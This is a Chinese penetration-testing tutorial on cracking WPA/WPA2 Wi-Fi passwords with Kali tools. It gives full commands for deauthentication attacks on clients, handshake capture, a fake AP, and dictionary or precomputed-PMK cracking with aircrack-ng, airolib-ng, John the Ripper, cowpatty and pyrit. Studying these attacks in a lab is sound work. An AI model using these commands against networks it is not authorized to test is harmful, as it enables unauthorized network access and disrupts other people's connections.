Kali渗透测试(四)——无线网络WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)
无线网络WPA的攻击
主要有PSK攻击和AIROLIB、JTR、cowpatty、pyrit等工具的使用
(一)WPA PSK 攻击
WPA不存在WEP的弱点,只能基于字典暴力破解
PSK破解过程
启动monitor
抓握手包并保存
deauthentication攻击获取4步握手信息
字典暴力破解
2.实践
AP设置为WPA,AES加密
2.1
首先检测专用的USB无线网卡,我用的是RT3070(或者是RTL8187都可以) 就是这里的wlan0
2.2
停止掉一些不必要的服务:service network-manager stop
, airmon-ng check kill
然后启动网卡的monitor 模式: airmon-ng start wlan0
开始网络探测:airodump-ng wlan0mon
2.3
拿第一个无线实验,抓取握手包
airodump-ng -c 11 --bssid 2C:XX:XX:1D:53:50 -w wpa wlan0mon
#抓包,-c指定信道,–bssid指定侦听的AP,-w写入wpa文件
发现有一个客户端在线,但是没有握手包,所以 deauthentication攻击让他重连,来尽可能多的抓包,aireplay-ng -0 2 -a 2C:XX:XX:1D:53:50 -c DC:EF:XX:XX:XX:XX wlan0mon
-0指定攻击次数,-a指定AP,-c指定客户端
#成功抓取握手信息,wpa-01.cap
2.4
用自带字典暴力破解,得到了密码
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
字典还有以下这些
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/
#/usr/share/wordlists/rockyou.txt.gz
这里的密码比较简单能用字典很快跑出来,但是如果密码比较复杂可能跑不出来。
2、无AP情况下的WPA密码破解
启动monitor
抓包并保存
根据probe信息伪造相同ESSID的AP
获取4步握手信息的前两个包
字典暴力破解
实践
窗口1 伪装AP,下面二选一
airbase-ng --essid leon -c 11 -z 2 wlan0mon #伪装AP,-z 2指定TKIP,即WPA1
airbase-ng --essid leon -c 11 -Z 4 wlan0mon #伪装AP,-Z 4指定WPA2
1
窗口2 侦听抓包
airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wpa wlan0mon #-c指定信道,--bssid指定侦听的AP,-w写入wpa文件
进行密码破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap #wpa这个文件就是抓包,可以用wireshark打开看看
#这时未成功连接,只有前面两个包,有可能破解不了
3、AIROLIB破解密码
原理
计算生成不变的PMK
PMK在破解阶段用于计算PTK
通过完整性摘要值破解密码
SQLite3数据库存储数据
实践
echo kifi > essid.txt
airolib-ng db --import essid essid.txt #创建数据库db
airolib-ng db --stats #当前数据库状态
airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt #导入密码
airolib-ng db --batch #批处理,计算出PMK
aircrack-ng -r db wpa-01.cap #破解
4、JTR破解密码
基于规则扩展密码字典
获取手机号段利用JTR规则增加最后几位数字
vi打开配置文件/etc/john/john.conf
在[List.Rules:Wordlist]最后
加一段[0−9][0-9][0−9][0-9][0−9][0-9][0−9][0-9]
john --wordlist=yd.txt --rules --stdout #根据yd.txt生成密码字典
john --wordlist=yd.txt --rules --stdout | aircrack-ng -e kifi -w - wpa-01.cap #破解,-w -指定前面输出的内容
5、cowpatty破解密码
WPA通用破解工具,多平台
(1)密码字典破解
cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi #用密码字典
(2)PMK破解
genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi #生成PMK
cowpatty -r wpa-01.cap -d pmkhash -s kifi #用PMK破解
6、pyrit破解密码
与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度
除了CPU,还可以用GPU
本身支持抓包获取四步握手,无需airodump
pyrit -r wlan0mon -o wpapyrit.cap stripLive #抓取WPA四次握手
pyrit -r wpapyrit.cap analyze #对抓来的包进行分析
pyrit -r wpa.cap -o wpapyrit.cap strip #如果是用airodump抓的包,需要转换再分析
(1)密码字典破解
pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b EC:26:CA:DC:29:B6 attack passthrough
#-b指定AP的MAC
(2)数据库模式破解
pyrit eval #查看默认数据库状态
pyrit -i /usr/share/john/password.lst import passwords #导入密码字典
pyrit -e kifi create essid #指定essid
pyrit batch #计算生成PMK,发挥GPU能力
pyrit -r wpapyrit.cap -b EC:26:CA:DC:29:B6 attack db #破解密码
结语
WPA安全性远高于WEP
破解难度高很多
pyrit工具比较好用
参考:
https://blog.csdn.net/weixin_44604541/article/details/104841574
Kali渗透测试(四)——无线网络WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)相关推荐
- Kali渗透测试:使用工具Metasploit攻击操作系统
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...
- Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击 Burp Suite 是用于攻击Web应用的集成平台,这个平台集成了许多工具.如何使用它来破解一些网站的密码.首先我们查看一个需要用 ...
- Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...
- Kali渗透测试:网络数据的嗅探与欺骗
Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...
- Kali渗透测试:身份认证攻击
Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...
- Kali渗透测试:拒绝服务攻击
Kali渗透测试:拒绝服务攻击 故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击.拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一.其实对网络带 ...
- Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...
- Kali渗透测试:使用Metasploit对Web应用的攻击
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下.这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从 ...
- Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个 ...
最新文章
- 用于自动泊车的鸟瞰图的边缘线的语义SLAM系统
- 第10章 嵌入式linux的调试技术
- 自定义 checkbox 新玩法 ?
- 1.5 卷积步长-深度学习第四课《卷积神经网络》-Stanford吴恩达教授
- 高中计算机应用基础试讲,试讲计算机应用基础.ppt
- Oracle高级SQL培训与讲解
- filebeat 配置文件详解
- 宅在家里写数据库中事务(ACID)
- 深圳荔枝公园没看到夜景(可能过节才有)
- 并发测试工具(ubuntu 16.04)
- 辨别身份真假之【天眼数聚】腾讯云身份证实名认证接口
- MySQL必知必会——第十四章使用子查询
- 【微信机器人】实现保存微信表情包到相册
- 电子信息要学c语言嘛,电子信息工程专业主要学什么 一般工资是多少
- 《操作系统》学习笔记|6.6外存空间管理
- JavaScript 去除数组中重复的元素 得到新数组
- 查看ubuntu系统的版本信息、内存大小及使用、磁盘大小等常用命令
- 网络舆情风险点排查工作实施方案
- CLRS 6.3建堆
- iOS开发 -- iPhone手机屏幕尺寸
热门文章
- 基于javaweb的图书管理系统(java+jsp+layui+bootstrap+servlet+mysql)
- 自私型人格分析,如何改变自私型性格?
- java生成二维码技术实现
- windows10系统-12-WPS文档编辑排版
- 【Word】长文档排版
- 分享多张图片到微信朋友圈
- 科大讯飞语音无限制录音、识别功能的实现:Android studio(一)
- 微信JS-SDK的PHP demo页面,解决Internal error 500错误
- 有用的“歪门邪道”-设计模式
- Docker 取代 VM !是什么让 Docker 比 VM 或裸机更安全?